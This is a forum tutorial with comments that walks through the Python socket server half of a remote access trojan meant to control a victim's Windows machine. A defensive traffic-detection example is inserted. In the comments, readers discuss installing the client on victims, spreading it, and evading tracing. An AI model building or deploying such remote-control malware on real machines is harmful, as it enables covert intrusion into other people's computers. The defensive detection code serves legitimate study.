I saw many people asking for a tutorial about writing their own Remote Administration Tool, so I will now introduce you to a basic kind of RAT. This program is not for real use, but for learning how you could write this kind of tool. It is coded in a basic way and is not very refined. I used Python 3, so you have to install it if you want to use this program unchanged. Also, this RAT is for Windows, and almost all features won't work under Linux.
OK, the RAT works with 2 different parts. The first is of course the malicious one, which you have to put on the victim's computer; the other one will control the victim's computer. From now on I will call the first part "client" and the second one "server".
I assume for this tutorial that you know how RATs generally work and how to program with Python. Python is a great language for beginners, so I think nobody will have problems understanding the code, but if you want to learn Python, just search on Null-Byte for "Python Tutorial". You will find many resources on that.
The Server Code
You can find the full Source here. I will try to explain the Source.
---Imports---
-socket is required for networking
-os is required for clearing the terminal (Will be seen later)
---Variables---
-port is for selecting the connection port. You can use any port you want, but I recommend using one which is probably not obtrusive/blocked.
---Functions---
-We have only one function at the moment, which is used for clearing the terminal (just an aesthetic feature ;) )
---Starting Server---
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
This sets up a TCP Socket connection.
host = socket.gethostname()
serversocket.bind((host, port))
serversocket.listen(1)
These lines start the server listening. The last line specifies that only 1 connection is allowed, which is OK at the beginning of our little RAT, but can be modified later.
clear()
Clears terminal.
print
Should be clear, shouldn't it?
clientsocket, addr = serversocket.accept()
Waiting for incoming Connection.
print("Connection from: " + str(addr))
Printing out the Connection Details.
msg = input()
Getting the instruction, which will be sent to the client.
if msg == "help":
    clear()
    print("-+-+-+-+-+HELP+-+-+-+-+-")
    print("Test Connection: 'test'")
    input("\nPress ENTER to continue")
Just a Help Window. You can see just one Instruction at the Moment, which we can use after setting up the Client.
else:
    msg = msg.encode("UTF-8")
    clientsocket.send(msg)
    msg = clientsocket.recv(4096)
    print(msg.decode("UTF-8"))
Every message which is not 'help' will be sent to the client; then the server waits for the response and prints it out. The message is encoded with UTF-8, because bytes are required for sending over networks.
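From the defender's side, the loop above has a recognisable shape on the wire: the client opens the connection, but the listener sends the first payload, a short UTF-8 string, and the client answers. The following added example (not part of the original tutorial) flags that shape in per-flow payload records; the record format, port allowlist, thresholds, port 50000 and all sample flows are constructed assumptions.

```python
from dataclasses import dataclass

# Assumption: server-first text protocols that legitimately have the same shape.
SERVER_FIRST_PORTS = {21, 25, 110, 143, 587}  # FTP, SMTP, POP3, IMAP, submission

@dataclass
class Payload:
    sender: str  # "initiator" = host that opened the TCP connection, else "responder"
    data: bytes  # application bytes seen in that direction

def is_text(data: bytes) -> bool:
    """True if the bytes decode as UTF-8 and contain only printable text."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)

def looks_like_command_channel(flow, dst_port, max_cmd_len=256, min_rounds=2):
    """True when the listener speaks first and the flow strictly alternates
    short UTF-8 command (responder) -> reply (initiator)."""
    if dst_port in SERVER_FIRST_PORTS or len(flow) < 2 * min_rounds:
        return False
    for i, p in enumerate(flow):
        expected = "responder" if i % 2 == 0 else "initiator"
        if p.sender != expected:
            return False
        if expected == "responder" and (len(p.data) > max_cmd_len or not is_text(p.data)):
            return False
    return True

# Constructed sample flows (not captured traffic).
RAT_LIKE = [Payload("responder", b"test"), Payload("initiator", b"ok"),
            Payload("responder", b"test"), Payload("initiator", b"ok")]
HTTP_LIKE = [Payload("initiator", b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"),
             Payload("responder", b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
             Payload("initiator", b"GET /a HTTP/1.1\r\nHost: example.test\r\n\r\n"),
             Payload("responder", b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")]
SMTP_LIKE = [Payload("responder", b"220 mail.example.test ESMTP\r\n"),
             Payload("initiator", b"EHLO host.example.test\r\n"),
             Payload("responder", b"250 mail.example.test\r\n"),
             Payload("initiator", b"QUIT\r\n")]

if __name__ == "__main__":
    for name, flow, port in [("rat_like", RAT_LIKE, 50000),
                             ("http_like", HTTP_LIKE, 80),
                             ("smtp_like", SMTP_LIKE, 25)]:
        print(name, looks_like_command_channel(flow, port))
```

Treat a hit as a triage signal only: the SMTP sample has the same shape and is excluded purely by the port allowlist, so the same traffic on another port would also be flagged.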
Conclusion
Now we've got a working server for sending and receiving instructions. You can see that it's not very well coded, but for learning some basics it's good enough :) I hope you learned something about the basics of programming a RAT. Please let me know whether I should explain in more detail or what I should add as a feature to the RAT. In the next part we will set up the client, the heart of our RAT, but for all who don't want to wait and want to test it out now, this will help you out ;) Just change the lHost variable to the IP of your server's computer and start trying.
~Thogs
11 Comments
Not bad, I like the tutorial. However, you can go in depth a little more, explaining for example what the client does and how you would install it on a victim's PC, etc. Otherwise good job +1
Thank you for the response. We will look on the Client in the next Part. If you want to, I can write a Tutorial about spreading after that.
ya that'd be great. Thx for contributing the great post!
that will be appreciated and this one is a good tutorial ;D
I'm going to have to take a look at the socket library. +1 for the detailed tutorial.
What is a socket?
A socket is sort of a logical term. A socket is bound to a port and used to communicate across a network. Python sockets are no different. You bind them to ports, and use them to make and use connections. Simply put, a socket allows two devices to communicate.
-Defalt
Very good however unfortunately it is very dangerous to use. This is because you are making the rat connect to your server, which means the client will have your ip in the source. And python files are not hard to decompile, so be careful. You'd much rather be using a reverse connection, so their machine is a server to be connected to by an untraceable client.
Robyn
In part 2 of this little series I wrote at the beginning that this piece of code is not for use in real scenarios. It's very basically written, because it's just for learning purposes, so I didn't use reverse connection or escaping techniques.
Just wanted to make that clear for anyone using the code
Robyn
Trying to create my own RAT, could you guide me please?......Thnx